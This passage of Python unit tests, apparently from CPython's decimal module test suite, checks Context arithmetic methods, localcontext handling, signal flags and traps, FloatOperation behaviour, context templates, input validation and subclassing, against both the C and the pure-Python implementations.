def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
    # Run the ContextAPItests suite against the C implementation (_decimal).
    decimal = C
class PyContextAPItests(ContextAPItests):
    # Run the ContextAPItests suite against the pure-Python implementation.
    decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
    # Run the ContextWithStatement suite against the C implementation.
    decimal = C
class PyContextWithStatement(ContextWithStatement):
    # Run the ContextWithStatement suite against the pure-Python implementation.
    decimal = P
class ContextFlags(unittest.TestCase):
    """Tests for the flags/traps bookkeeping on Context objects."""

    def test_flags_irrelevant(self):
        # check that the result (numeric result + flags raised) of an
        # arithmetic operation doesn't depend on the current flags
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped
        Subnormal = self.decimal.Subnormal

        def raise_error(context, flag):
            # Set a flag the way each implementation allows: the C module has
            # no _raise_error hook, so poke the flags dict directly there.
            if self.decimal == C:
                context.flags[flag] = True
                if context.traps[flag]:
                    raise flag
            else:
                context._raise_error(flag)

        context = Context(prec=9, Emin = -425000000, Emax = 425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])

        # operations that raise various flags, in the form (function, arglist)
        operations = [
            (context._apply, [Decimal("100E-425000010")]),
            (context.sqrt, [Decimal(2)]),
            (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
            ]

        # try various flags individually, then a whole lot at once
        flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
                    [Inexact, Rounded, Underflow, Clamped, Subnormal]]

        for fn, args in operations:
            # find answer and flags raised using a clean context
            context.clear_flags()
            ans = fn(*args)
            flags = [k for k, v in context.flags.items() if v]

            for extra_flags in flagsets:
                # set flags, before calling operation
                context.clear_flags()
                for flag in extra_flags:
                    raise_error(context, flag)
                new_ans = fn(*args)

                # flags that we expect to be set after the operation
                expected_flags = list(flags)
                for flag in extra_flags:
                    if flag not in expected_flags:
                        expected_flags.append(flag)
                # sort by id so both lists have a common, deterministic order
                expected_flags.sort(key=id)

                # flags we actually got
                new_flags = [k for k,v in context.flags.items() if v]
                new_flags.sort(key=id)

                self.assertEqual(ans, new_ans,
                                 "operation produces different answers depending on flags set: " +
                                 "expected %s, got %s." % (ans, new_ans))
                self.assertEqual(new_flags, expected_flags,
                                 "operation raises different flags depending on flags set: " +
                                 "expected %s, got %s" % (expected_flags, new_flags))

    def test_flag_comparisons(self):
        # flags/traps SignalDicts compare (un)equal to plain dicts by content
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded

        c = Context()

        # Valid SignalDict
        self.assertNotEqual(c.flags, c.traps)
        self.assertNotEqual(c.traps, c.flags)

        c.flags = c.traps
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        c.flags[Rounded] = True
        c.traps = c.flags
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        d = {}
        d.update(c.flags)
        self.assertEqual(d, c.flags)
        self.assertEqual(c.flags, d)

        d[Inexact] = True
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        # Invalid SignalDict
        d = {Inexact:False}
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        d = ["xyz"]
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

    @requires_IEEE_754
    def test_float_operation(self):
        # FloatOperation is signaled on implicit float->Decimal conversion
        # and, when trapped, raised instead.
        Decimal = self.decimal.Decimal
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            ##### trap is off by default
            self.assertFalse(c.traps[FloatOperation])

            # implicit conversion sets the flag
            c.clear_flags()
            self.assertEqual(Decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertEqual(c.create_decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion does not set the flag
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            # comparison sets the flag
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            ##### set the trap
            c.traps[FloatOperation] = True

            # implicit conversion raises
            c.clear_flags()
            self.assertRaises(FloatOperation, Decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertRaises(FloatOperation, c.create_decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion is silent
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

    def test_float_comparison(self):
        # Mixed Decimal/float comparisons signal (or, when trapped for
        # ordering comparisons, raise) FloatOperation.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        def assert_attr(a, b, attr, context, signal=None):
            # Call a.<attr>(b) and check FloatOperation was set (or raised).
            context.clear_flags()
            f = getattr(a, attr)
            if signal == FloatOperation:
                self.assertRaises(signal, f, b)
            else:
                self.assertIs(f(b), True)
            self.assertTrue(context.flags[FloatOperation])

        small_d = Decimal('0.25')
        big_d = Decimal('3.0')
        small_f = 0.25
        big_f = 3.0

        zero_d = Decimal('0.0')
        neg_zero_d = Decimal('-0.0')
        zero_f = 0.0
        neg_zero_f = -0.0

        inf_d = Decimal('Infinity')
        neg_inf_d = Decimal('-Infinity')
        inf_f = float('inf')
        neg_inf_f = float('-inf')

        def doit(c, signal=None):
            # Order
            for attr in '__lt__', '__le__':
                assert_attr(small_d, big_f, attr, c, signal)

            for attr in '__gt__', '__ge__':
                assert_attr(big_d, small_f, attr, c, signal)

            # Equality
            assert_attr(small_d, small_f, '__eq__', c, None)

            assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(neg_zero_d, zero_f, '__eq__', c, None)

            assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(zero_d, zero_f, '__eq__', c, None)

            assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
            assert_attr(inf_d, inf_f, '__eq__', c, None)

            # Inequality
            assert_attr(small_d, big_f, '__ne__', c, None)

            assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)

            assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
            assert_attr(inf_d, neg_inf_f, '__ne__', c, None)

            assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)

        def test_containers(c, signal=None):
            # Container operations compare elements and must signal too.
            c.clear_flags()
            s = set([100.0, Decimal('100.0')])
            self.assertEqual(len(s), 1)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            if signal:
                self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
            else:
                s = sorted([10.0, Decimal('10.0')])
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in [Decimal('10.0'), 1.0]
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
            self.assertTrue(c.flags[FloatOperation])

        nc = Context()
        with localcontext(nc) as c:
            self.assertFalse(c.traps[FloatOperation])
            doit(c, signal=None)
            test_containers(c, signal=None)

            c.traps[FloatOperation] = True
            doit(c, signal=FloatOperation)
            test_containers(c, signal=FloatOperation)

    def test_float_operation_default(self):
        # FloatOperation is neither set nor trapped by default.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        FloatOperation= self.decimal.FloatOperation

        context = Context()
        self.assertFalse(context.flags[FloatOperation])
        self.assertFalse(context.traps[FloatOperation])

        context.clear_traps()
        context.traps[Inexact] = True
        context.traps[FloatOperation] = True
        self.assertTrue(context.traps[FloatOperation])
        self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
    # Run the ContextFlags suite against the C implementation.
    decimal = C
class PyContextFlags(ContextFlags):
    # Run the ContextFlags suite against the pure-Python implementation.
    decimal = P
class SpecialContexts(unittest.TestCase):
    """Test the context templates."""

    def test_context_templates(self):
        """setcontext(template) must install a fresh copy of the template."""
        dec = self.decimal
        getcontext, setcontext = dec.getcontext, dec.setcontext
        BasicContext = dec.BasicContext
        ExtendedContext = dec.ExtendedContext

        assert_signals(self, BasicContext, 'traps',
            [dec.InvalidOperation, dec.DivisionByZero, dec.Overflow,
             dec.Underflow, dec.Clamped]
        )

        saved_ctx = getcontext().copy()
        saved_precs = (BasicContext.prec, ExtendedContext.prec)

        # Record only the failure class so the templates and the thread
        # context can be restored before re-raising.
        failure = None
        try:
            BasicContext.prec = ExtendedContext.prec = 441
            for template in (BasicContext, ExtendedContext):
                setcontext(template)
                active = getcontext()
                self.assertIsNot(active, template)
                self.assertEqual(active.prec, 441)
        except Exception as err:
            failure = err.__class__
        finally:
            BasicContext.prec, ExtendedContext.prec = saved_precs
            setcontext(saved_ctx)
        if failure:
            raise failure

    def test_default_context(self):
        """DefaultContext is copied by setcontext(), not installed directly."""
        dec = self.decimal
        getcontext, setcontext = dec.getcontext, dec.setcontext
        DefaultContext = dec.DefaultContext

        self.assertEqual(dec.BasicContext.prec, 9)
        self.assertEqual(dec.ExtendedContext.prec, 9)

        assert_signals(self, DefaultContext, 'traps',
            [dec.InvalidOperation, dec.DivisionByZero, dec.Overflow]
        )

        saved_ctx = getcontext().copy()
        saved_prec = DefaultContext.prec

        failure = None
        try:
            active = getcontext()
            active_prec = active.prec
            # mutating the template must not affect the active context ...
            DefaultContext.prec = 961
            self.assertEqual(getcontext().prec, active_prec)
            # ... and installing the template must install a copy of it
            setcontext(DefaultContext)
            active = getcontext()
            self.assertIsNot(active, DefaultContext)
            self.assertEqual(active.prec, 961)
        except Exception as err:
            failure = err.__class__
        finally:
            DefaultContext.prec = saved_prec
            setcontext(saved_ctx)
        if failure:
            raise failure
class CSpecialContexts(SpecialContexts):
    # Run the SpecialContexts suite against the C implementation.
    decimal = C
class PySpecialContexts(SpecialContexts):
    # Run the SpecialContexts suite against the pure-Python implementation.
    decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
    # Run the ContextInputValidation suite against the C implementation.
    decimal = C
class PyContextInputValidation(ContextInputValidation):
    # Run the ContextInputValidation suite against the pure-Python implementation.
    decimal = P
class ContextSubclassing(unittest.TestCase):
    """A Context subclass with its own __init__ must behave like Context."""

    def test_context_subclassing(self):
        decimal = self.decimal
        Decimal = decimal.Decimal
        Context = decimal.Context
        Clamped = decimal.Clamped
        DivisionByZero = decimal.DivisionByZero
        Inexact = decimal.Inexact
        Overflow = decimal.Overflow
        Rounded = decimal.Rounded
        Subnormal = decimal.Subnormal
        Underflow = decimal.Underflow
        InvalidOperation = decimal.InvalidOperation

        class MyContext(Context):
            # Overrides only the attributes that were explicitly passed;
            # everything else keeps the base Context defaults.
            def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
                               capitals=None, clamp=None, flags=None,
                               traps=None):
                Context.__init__(self)
                if prec is not None:
                    self.prec = prec
                if rounding is not None:
                    self.rounding = rounding
                if Emin is not None:
                    self.Emin = Emin
                if Emax is not None:
                    self.Emax = Emax
                if capitals is not None:
                    self.capitals = capitals
                if clamp is not None:
                    self.clamp = clamp
                if flags is not None:
                    if isinstance(flags, list):
                        # expand a signal list into the {signal: bool} form
                        flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
                    self.flags = flags
                if traps is not None:
                    if isinstance(traps, list):
                        traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
                    self.traps = traps

        # defaults of the subclass must match the base class exactly
        c = Context()
        d = MyContext()
        for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
                     'flags', 'traps'):
            self.assertEqual(getattr(c, attr), getattr(d, attr))

        # prec
        self.assertRaises(ValueError, MyContext, **{'prec':-1})
        c = MyContext(prec=1)
        self.assertEqual(c.prec, 1)
        self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)

        # rounding
        self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
        c = MyContext(rounding=ROUND_DOWN, prec=1)
        self.assertEqual(c.rounding, ROUND_DOWN)
        self.assertEqual(c.plus(Decimal('9.9')), 9)

        # Emin
        self.assertRaises(ValueError, MyContext, **{'Emin':5})
        c = MyContext(Emin=-1, prec=1)
        self.assertEqual(c.Emin, -1)
        x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
        self.assertEqual(x, Decimal('0.0'))
        for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
            self.assertTrue(c.flags[signal])

        # Emax
        self.assertRaises(ValueError, MyContext, **{'Emax':-1})
        c = MyContext(Emax=1, prec=1)
        self.assertEqual(c.Emax, 1)
        self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
        # only the C implementation sets flags when a trap fires
        if self.decimal == C:
            for signal in (Inexact, Overflow, Rounded):
                self.assertTrue(c.flags[signal])

        # capitals
        self.assertRaises(ValueError, MyContext, **{'capitals':-1})
        c = MyContext(capitals=0)
        self.assertEqual(c.capitals, 0)
        x = c.create_decimal('1E222')
        self.assertEqual(c.to_sci_string(x), '1e+222')

        # clamp
        self.assertRaises(ValueError, MyContext, **{'clamp':2})
        c = MyContext(clamp=1, Emax=99)
        self.assertEqual(c.clamp, 1)
        x = c.plus(Decimal('1e99'))
        self.assertEqual(str(x), '1.000000000000000000000000000E+99')

        # flags
        self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
        c = MyContext(flags=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.flags[signal])
        c.clear_flags()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.flags[signal])

        # traps
        self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
        c = MyContext(traps=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.traps[signal])
        c.clear_traps()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.traps[signal])
